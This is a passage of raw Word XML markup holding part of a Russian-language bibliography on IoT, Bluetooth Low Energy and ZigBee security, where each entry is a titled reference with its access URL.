          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>efo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blog</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/281048/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRDefault="00B47356" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve">Разработка </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve"> устройств с использованием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve"> LE</w:t>
      </w:r>
      <w:r w:rsidR="00F455FD" w:rsidRPr="00F455FD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>https://geektimes.ru/post/276558/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRPr="00F455FD" w:rsidRDefault="00F455FD" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00F455FD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth Low Energy for the Internet of Things</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidRPr="00F455FD">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>blog</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>nxp</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>com</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>portable</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>wearable</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>bluetooth</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>low</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>energy</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>for</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>the</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>internet</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>of</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>things</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F455FD" w:rsidRDefault="00F455FD" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F455FD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overview and Evaluation of Bluetooth Low Energy: An Emerging Low-Power Wireless Technology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F455FD">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://www.mdpi.com/1424-8220/12/9/11734/htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F455FD" w:rsidRPr="003802F9" w:rsidRDefault="003802F9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="003802F9">
        <w:t xml:space="preserve">Спецификация </w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:t xml:space="preserve">. Безопасность </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>habrahabr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/158355/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F455FD" w:rsidRPr="003802F9" w:rsidRDefault="003802F9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZIGBEE SECURITY: BASICS (PART 1)</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://research.kudelskisecurity.com/2017/11/01/zigbee-security-basics-part-1/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRPr="003802F9" w:rsidRDefault="003802F9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ZIGBEE: ВЗГЛЯД ВГЛУБЬ </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://cyberleninka.ru/article/n/zigbee-vzglyad-vglub.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003802F9" w:rsidRPr="00A924A9" w:rsidRDefault="003802F9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZIGBEE SECURITY: BASICS (PART 2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="003802F9">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://research.kudelskisecurity.com/2017/11/08/zigbee-security-basics-part-2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A924A9" w:rsidRPr="00A924A9" w:rsidRDefault="00A924A9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve">Безопасная передача данных в сети </w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve"> на примере </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t>радиомодулей</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A924A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>russianelectronics</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ru</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>leader</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>r</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>review</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/2187/</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/57691/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A924A9" w:rsidRPr="00A924A9" w:rsidRDefault="00A924A9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Guide to Bluetooth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-121r2.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A924A9" w:rsidRPr="00A924A9" w:rsidRDefault="00A924A9" w:rsidP="005F51BA">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A924A9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ПРОБЛЕМЫ БЕЗОПАСНОСТИ ИНТЕРНЕТ ВЕЩЕЙ: ОБЗОР. </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>https://cyberleninka.ru/article/n/problemy-bezopasnosti-internet-veschey-obzor</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003802F9" w:rsidRDefault="003802F9" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ZIGBEE SECURITY: BASICS (PART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A924A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A924A9" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
